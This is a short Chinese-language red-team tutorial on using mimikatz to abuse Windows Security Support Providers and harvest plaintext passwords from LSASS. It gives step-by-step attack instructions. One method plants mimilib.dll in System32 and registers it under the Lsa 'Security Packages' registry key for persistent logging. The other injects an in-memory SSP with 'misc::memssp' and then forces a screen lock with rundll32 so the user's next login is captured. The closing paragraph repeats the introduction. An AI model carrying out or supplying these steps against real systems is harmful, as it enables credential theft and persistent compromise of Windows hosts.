首先说一下SSP,安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。LSASS进程正在Windows启动期间加载安全支持提供程序DLL。这种行为使红队的攻击者可以删除一个任意的SSP DLL以便与LSASS进程进行交互并记录该进程中存储的所有密码,或者直接用恶意的SSP对该进程进行修补而无需接触磁盘。
该技术需要管理员权限,可用于收集系统的凭证,这里用mimikatz介绍两种,一种是 注册SSP DLL ,二种是 加载到内存
注册SSP DLL
Mimikatz压缩包中提供了 mimilib.dll DLL文件,放在lsass.exe同级目录下
1)将mimilib.dll复制到c:\windows\system32下
2)修改注册表
位置HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\
Security Packages的值设置为mimilib.dll
3)等待系统重新启动
系统重新启动后,在c:\windows\system32生成文件kiwissp.log,记录当前用户的明文口令
加载到内存
当用户再次通过系统进行身份验证时,将在System32中创建一个日志文件,其中将包含纯文本用户密码,此操作不需要重启目标机子,只需要锁屏对方再登陆时即可记录下明文密码。但是,缺点是在重新启动过程中不会持续存在
privilege::debug
misc::memssp exit
当看到Injected =)的时候,表明已经注入成功。
接下来就是使target的屏幕锁屏,终端键入
rundll32.exe user32.dll,LockWorkStation命令
用户再次输入账号密码登录时,明文密码将记录C:\Windows\System32\mimilsa.log
SSP,安全支持提供程序SSP是windows API ,用于扩展Windows身份验证机制 。lsass(本地安全和登录策略)在Windows启动期间加载SSP,这样攻击者便可与lsass交互并记录该进程中所有的交互密码